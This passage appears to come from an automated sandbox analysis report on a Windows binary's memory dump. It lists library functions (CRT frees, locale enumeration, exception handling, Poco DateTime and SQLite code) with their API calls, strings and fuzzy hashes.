Instruction Fuzzy Hash: 49110C377007059FDB18DF39C8915BAB796FF84758B14442DE5D687A80D3B5BA42CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00040400, Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(6871E12C,?,?,15555555,?,?,00038091,6871E12C,15555555,?,6871E12C,?,0010DD70,15555555,6871E12C,?), ref: 00040410

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 552f2d919b14af46b35e28a2c60805967eb29e80e4775985e9e4c28d4c0d51e5
Instruction ID: 52679c10fd9ca48435c4548dbff59376cc9657f00ef5e175622f91651519874d
Opcode Fuzzy Hash: 552f2d919b14af46b35e28a2c60805967eb29e80e4775985e9e4c28d4c0d51e5
Instruction Fuzzy Hash: 37110C76F042099FDB08CE9EDD517ADFBFAEB88310F1581A9E419E7350D6749E008B80

Uniqueness

Uniqueness Score: -1.00%

Function 00103A89, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 000FBA6F: GetLastError.KERNEL32(?,?,?,000F1742,?,?,00000000,?,000F1119,?,?,?), ref: 000FBA74
Part of subcall function 000FBA6F: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,000F1119,?,?,?), ref: 000FBB12

EnumSystemLocalesW.KERNEL32(00103D67,00000001,?,?,-00000050,?,00104106,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00103AD3

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7d21683389a650e0030ab10e9c31cce32ee5b947addbe58a8bf9dfe7893b1cee
Instruction ID: 3a3e6b2c5db6eaf72339a510546299198dfc5c31334ca6719e1c9de855af842e
Opcode Fuzzy Hash: 7d21683389a650e0030ab10e9c31cce32ee5b947addbe58a8bf9dfe7893b1cee
Instruction Fuzzy Hash: 53F0C8363003089FDB145F75D881A767B99EB80758F05442DF5958B5D0C7B29D41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 000FBCCE, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 000FA0F3: EnterCriticalSection.KERNEL32(-001ADD28,?,000F7C41,?,0019D8D0,0000000C,000F7F22,?), ref: 000FA102

EnumSystemLocalesW.KERNEL32(000FBCC1,00000001,0019DA30,0000000C,000FC12C,00000000), ref: 000FBD06

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 39f2b4e57e30e49478bfa235c1d22ac1932cd74e659c219ea78a396e4fed26e5
Instruction ID: 89e681bd725fd2ba3b2cff681106ef9d744820d43a3b8470b158b351011bc4a9
Opcode Fuzzy Hash: 39f2b4e57e30e49478bfa235c1d22ac1932cd74e659c219ea78a396e4fed26e5
Instruction Fuzzy Hash: 91F03C72A00244DFD710DFA8E842BAD7BF0FB09721F10411AF5159BAE2CB754981DF51

Uniqueness

Uniqueness Score: -1.00%

Function 001039A3, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 000FBA6F: GetLastError.KERNEL32(?,?,?,000F1742,?,?,00000000,?,000F1119,?,?,?), ref: 000FBA74
Part of subcall function 000FBA6F: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,000F1119,?,?,?), ref: 000FBB12

EnumSystemLocalesW.KERNEL32(001038FC,00000001,?,?,?,00104164,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001039DA

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: aa47ebffa299739a8643b99d8f6236e277f6d36eb8d5b29bb520055727e2a045
Instruction ID: 9de49a9ac1ef5b022d9a732ee36713b018610a62d31305572ed3da37b5153d3d
Opcode Fuzzy Hash: aa47ebffa299739a8643b99d8f6236e277f6d36eb8d5b29bb520055727e2a045
Instruction Fuzzy Hash: 25F05C3630030857CB049F35C8556667F54EFC1714F064058EB058B591C3B2DA42C750

Uniqueness

Uniqueness Score: -1.00%

Function 000FC230, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,000F94F3,?,20001004,00000000,00000002,?,?,000F8B00), ref: 000FC264

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 40d1e17f8532f14243abed5d773e69d71e389c8070924c1510c44f6510ed5c3b
Instruction ID: 4ca4933db52e6d558a2d292facaa6819cad54740b1d464780b6970aa245d927d
Opcode Fuzzy Hash: 40d1e17f8532f14243abed5d773e69d71e389c8070924c1510c44f6510ed5c3b
Instruction Fuzzy Hash: FFE01A3250061CBBDF122FA0DD05EAE3B59EF48B51F044010FE0669521CB318921BAE1

Uniqueness

Uniqueness Score: -1.00%

Function 000FA48B, Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 000FA4FA
_free.LIBCMT ref: 000FA510
_free.LIBCMT ref: 000FA523
_free.LIBCMT ref: 000FA538
_free.LIBCMT ref: 000FA54D
GetCPInfo.KERNEL32(?,?), ref: 000FA597

Part of subcall function 00104E63: _free.LIBCMT ref: 00104ECE

_free.LIBCMT ref: 000FA802
_free.LIBCMT ref: 000FA815
_free.LIBCMT ref: 000FA823
_free.LIBCMT ref: 000FA82E
_free.LIBCMT ref: 000FA870
_free.LIBCMT ref: 000FA878
_free.LIBCMT ref: 000FA87E
_free.LIBCMT ref: 000FA886
_free.LIBCMT ref: 000FA894

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 6452bbf893eae0f4c550dc4110ee51f6d0fe155be00f86f5e8c3f3589749d882
Instruction ID: a65c3c9334cf53e95aa5b51b77abcbb2e65d078fbc15437707de9cfe538df99e
Opcode Fuzzy Hash: 6452bbf893eae0f4c550dc4110ee51f6d0fe155be00f86f5e8c3f3589749d882
Instruction Fuzzy Hash: 48D19FB1E003099FDB119FA9C881BFEBBF4BF09300F144029E699E7642DB75A846DB51

Uniqueness

Uniqueness Score: -1.00%

Function 000384B0, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 208COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000384C4
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000384E7
__allrem.LIBCMT ref: 000384F2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000386B5
__allrem.LIBCMT ref: 000386C0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000386D7
__allrem.LIBCMT ref: 000386E2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000386F9
__allrem.LIBCMT ref: 00038707
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00038719

Strings

D:\vcpkg\buildtrees\poco\src\a79b8b5d92-31a2ca8a23.clean\Foundation\src\DateTime.cpp, xrefs: 00038553, 00038603
month >= 1 && month <= 12, xrefs: 00038558, 00038608

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem
String ID: D:\vcpkg\buildtrees\poco\src\a79b8b5d92-31a2ca8a23.clean\Foundation\src\DateTime.cpp$month >= 1 && month <= 12
API String ID: 632788072-4098424954
Opcode ID: 286bc8b87cfd75fb137be55d450202c314889f28d3f977309d4b0da6096a4b16
Instruction ID: 1182e7282c80c12baff8832bea49acc7bb13dfcaadc482a964ca9a62b4a28d99
Opcode Fuzzy Hash: 286bc8b87cfd75fb137be55d450202c314889f28d3f977309d4b0da6096a4b16
Instruction Fuzzy Hash: 30612775B00B40EADB355B68CC83BBA72EDEF94715F00C819F546EB6D2EA70E9408754

Uniqueness

Uniqueness Score: -1.00%

Function 000EEB8C, Relevance: 19.8, APIs: 13, Instructions: 301COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 000EEBF7
DName::operator+.LIBCMT ref: 000EED2D

Part of subcall function 000EAB09: shared_ptr.LIBCMT ref: 000EAB25

DName::operator+.LIBCMT ref: 000EED79
DName::operator+.LIBCMT ref: 000EED88
DName::operator+.LIBCMT ref: 000EECE3

Part of subcall function 000F0413: DName::operator=.LIBVCRUNTIME ref: 000F04A2

DName::operator+.LIBCMT ref: 000EEEB5
DName::operator=.LIBVCRUNTIME ref: 000EEEF5
DName::DName.LIBVCRUNTIME ref: 000EEF0D
DName::operator+.LIBCMT ref: 000EEF1C
DName::operator+.LIBCMT ref: 000EEF28

Part of subcall function 000F0413: Replicator::operator[].LIBVCRUNTIME ref: 000F0450

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
String ID:
API String ID: 1026175760-0
Opcode ID: 75d9183ffafdc3214e900966cb9d797cd9288e223a2ba0e7bd53d094bc429e24
Instruction ID: dd6c82760173f1c8ed4e9d2684c47caa8b86be94b6c09e93ae2d31ca4fab5197
Opcode Fuzzy Hash: 75d9183ffafdc3214e900966cb9d797cd9288e223a2ba0e7bd53d094bc429e24
Instruction Fuzzy Hash: 7BC1D3B1A042889FDB24DFA5D845BEEB7F4AF4A300F14406DE146B7682EB71A944CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00101E91, Relevance: 19.6, APIs: 13, Instructions: 88COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00101EAE

Part of subcall function 000FB6F7: HeapFree.KERNEL32(00000000,00000000,?,001025E6,?,00000000,?,?,?,00102889,?,00000007,?,?,00102E7F,?), ref: 000FB70D
Part of subcall function 000FB6F7: GetLastError.KERNEL32(?,?,001025E6,?,00000000,?,?,?,00102889,?,00000007,?,?,00102E7F,?,?), ref: 000FB71F

_free.LIBCMT ref: 00101EC0
_free.LIBCMT ref: 00101ED2
_free.LIBCMT ref: 00101EE4
_free.LIBCMT ref: 00101EF6
_free.LIBCMT ref: 00101F08
_free.LIBCMT ref: 00101F1A
_free.LIBCMT ref: 00101F2C
_free.LIBCMT ref: 00101F3E
_free.LIBCMT ref: 00101F50
_free.LIBCMT ref: 00101F62
_free.LIBCMT ref: 00101F74
_free.LIBCMT ref: 00101F86

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f831d6e4f6f2f768d41ef73db441d4735a03e4b6be7727f996659d72071992a3
Instruction ID: 0a5e0466eabd08039b4540ec44b9325ad99ccafd10af8dd0fb50dac470f0ecfa
Opcode Fuzzy Hash: f831d6e4f6f2f768d41ef73db441d4735a03e4b6be7727f996659d72071992a3
Instruction Fuzzy Hash: AA213236514244BBC620EB6DF8CAD7A77F9AB053107640809F165D7D92DFB9FCC48A28

Uniqueness

Uniqueness Score: -1.00%

Function 000EF66D, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 295COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 000EF742
UnDecorator::getSignedDimension.LIBCMT ref: 000EF74D
DName::DName.LIBVCRUNTIME ref: 000EF75E
UnDecorator::getSignedDimension.LIBCMT ref: 000EF86A
UnDecorator::getSignedDimension.LIBCMT ref: 000EF887
UnDecorator::getSignedDimension.LIBCMT ref: 000EF8A4
UnDecorator::getSignedDimension.LIBCMT ref: 000EF8E0
_swprintf.LIBCMTD ref: 000EF95F
DName::operator+.LIBCMT ref: 000EF9D9

Part of subcall function 000EBA71: DName::DName.LIBVCRUNTIME ref: 000EBA86

DName::operator+.LIBCMT ref: 000EF9E4

Strings

NULL, xrefs: 000EF6FE

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$_swprintf
String ID: NULL
API String ID: 138750261-324932091
Opcode ID: fd735d03739f82aadc177dc28ebc718c6a047b3d52d33e77052c8129eea09781
Instruction ID: 01de8d385571390dab4d00ea82437dc0154c6c33f851e009998a559e26e026f9
Opcode Fuzzy Hash: fd735d03739f82aadc177dc28ebc718c6a047b3d52d33e77052c8129eea09781
Instruction Fuzzy Hash: BB91C5729042CB9EDB19EFB6DA9ABFE77F8AB06300F140139E041B2593DB759A04C751

Uniqueness

Uniqueness Score: -1.00%

Function 00102CE8, Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00102D21

Part of subcall function 000FB6F7: HeapFree.KERNEL32(00000000,00000000,?,001025E6,?,00000000,?,?,?,00102889,?,00000007,?,?,00102E7F,?), ref: 000FB70D
Part of subcall function 000FB6F7: GetLastError.KERNEL32(?,?,001025E6,?,00000000,?,?,?,00102889,?,00000007,?,?,00102E7F,?,?), ref: 000FB71F

Part of subcall function 00101E91: _free.LIBCMT ref: 00101EAE
Part of subcall function 00101E91: _free.LIBCMT ref: 00101EC0
Part of subcall function 00101E91: _free.LIBCMT ref: 00101ED2
Part of subcall function 00101E91: _free.LIBCMT ref: 00101EE4
Part of subcall function 00101E91: _free.LIBCMT ref: 00101EF6
Part of subcall function 00101E91: _free.LIBCMT ref: 00101F08
Part of subcall function 00101E91: _free.LIBCMT ref: 00101F1A
Part of subcall function 00101E91: _free.LIBCMT ref: 00101F2C
Part of subcall function 00101E91: _free.LIBCMT ref: 00101F3E
Part of subcall function 00101E91: _free.LIBCMT ref: 00101F50
Part of subcall function 00101E91: _free.LIBCMT ref: 00101F62
Part of subcall function 00101E91: _free.LIBCMT ref: 00101F74
Part of subcall function 00101E91: _free.LIBCMT ref: 00101F86

_free.LIBCMT ref: 00102D43
_free.LIBCMT ref: 00102D58
_free.LIBCMT ref: 00102D63
_free.LIBCMT ref: 00102D85
_free.LIBCMT ref: 00102D98
_free.LIBCMT ref: 00102DA6
_free.LIBCMT ref: 00102DB1
_free.LIBCMT ref: 00102DE9
_free.LIBCMT ref: 00102DF0
_free.LIBCMT ref: 00102E0D
_free.LIBCMT ref: 00102E25

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fd7cec9ea09a4a76c0588e81d37193b2fdc9d81e0da54af239257acc630cbddc
Instruction ID: cf8ea5368ccc8455ab27899e9dc78ee2ef7c06f92cda48dfe680e1ba34bb3284
Opcode Fuzzy Hash: fd7cec9ea09a4a76c0588e81d37193b2fdc9d81e0da54af239257acc630cbddc
Instruction Fuzzy Hash: 87312A356003059FEB31AB79E849BBAB3E8EF04310F104429E1D9D6592EFB5AD809B24

Uniqueness

Uniqueness Score: -1.00%

Function 00018D30, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 177COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00018D6A
std::_Lockit::_Lockit.LIBCPMT ref: 00018D88
std::_Lockit::~_Lockit.LIBCPMT ref: 00018DA8
std::_Facet_Register.LIBCPMT ref: 00018F14
std::_Lockit::~_Lockit.LIBCPMT ref: 00018F2C
Concurrency::cancel_current_task.LIBCPMT ref: 00018F45
Concurrency::cancel_current_task.LIBCPMT ref: 00018F4A
Concurrency::cancel_current_task.LIBCPMT ref: 00018F4F

Strings

true, xrefs: 00018EDC
false, xrefs: 00018EB7

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
String ID: false$true
API String ID: 3742692055-2658103896
Opcode ID: 1e83bdfe195e25f2e16c1c17947f61544f16c50967b86f3037b1bd1cde7e404e
Instruction ID: 0a28edc281e600fa8a0c36e32f8ea6a039954ca7d8f803c005affafe19be38bb
Opcode Fuzzy Hash: 1e83bdfe195e25f2e16c1c17947f61544f16c50967b86f3037b1bd1cde7e404e
Instruction Fuzzy Hash: 2D51BD709003449FDB25DF64E940BEABBF4EF14344F14856DE845AB782EB31AA86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00038740, Relevance: 16.7, APIs: 11, Instructions: 156COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0003876B
__floor_pentium4.LIBCMT ref: 000387A6
__floor_pentium4.LIBCMT ref: 000387C6
__floor_pentium4.LIBCMT ref: 000387F5
__floor_pentium4.LIBCMT ref: 00038836
__floor_pentium4.LIBCMT ref: 00038870
__floor_pentium4.LIBCMT ref: 000388B2
__floor_pentium4.LIBCMT ref: 00038907
__floor_pentium4.LIBCMT ref: 0003893A
__floor_pentium4.LIBCMT ref: 0003896D
__floor_pentium4.LIBCMT ref: 000389A0

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 550258bfb21cf5cea0e52bb5cdec0c2c07a2b45d78de5c8c20a74a642bcf09c7
Instruction ID: c3be6f50bad107f19b798178458b9f40efeed75208b88b542e744464c8afc5cb
Opcode Fuzzy Hash: 550258bfb21cf5cea0e52bb5cdec0c2c07a2b45d78de5c8c20a74a642bcf09c7
Instruction Fuzzy Hash: 6871E525800E1CD9CB12EFB4E8620AEFB75FF5A382F10964AE5897A511EF3182D1D785

Uniqueness

Uniqueness Score: -1.00%

Function 000E99C6, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMON

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 000E9AC3
___TypeMatch.LIBVCRUNTIME ref: 000E9BF4
CatchIt.LIBVCRUNTIME ref: 000E9C45
IsInExceptionSpec.LIBVCRUNTIME ref: 000E9CC6
_UnwindNestedFrames.LIBCMT ref: 000E9D4A
CallUnexpected.LIBVCRUNTIME ref: 000E9D65

Strings

csm, xrefs: 000E9B1C
csm, xrefs: 000E9A70
csm, xrefs: 000E9A03

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwind
String ID: csm$csm$csm
API String ID: 2378971308-393685449
Opcode ID: df80b6558e7aade344bfafffc6ca5cef1571e251d0c5a0fa93b0ec104afc6adc
Instruction ID: 0a16dff866b2db68d0f3ea48a4733a927b1df4deacc8283ab90995b2a60167f8
Opcode Fuzzy Hash: df80b6558e7aade344bfafffc6ca5cef1571e251d0c5a0fa93b0ec104afc6adc
Instruction Fuzzy Hash: 1FB17871800299EFCF29EFA6D9819AEBBB5FF04310F14416AE8157B212D331EA51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00027E10, Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 231COMMON

Download Yara Rule

APIs

allocator.LIBCONCRTD ref: 00027FB6

Strings

_curDataSet < _extractors.size(), xrefs: 00027EC4
/, xrefs: 00027FC4
D:\vcpkg\buildtrees\poco\src\a79b8b5d92-31a2ca8a23.clean\Data\include\Poco/Data/StatementImpl.h, xrefs: 00027EBF
No data received, xrefs: 00028095
columnsReturned() == sqlite3_column_count(_pStmt), xrefs: 00027E7D
t value, xrefs: 00027FED
D:\vcpkg\buildtrees\poco\src\a79b8b5d92-31a2ca8a23.clean\Data\SQLite\src\SQLiteStatementImpl.cpp, xrefs: 00027E78
/, xrefs: 00027FCB

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: allocator
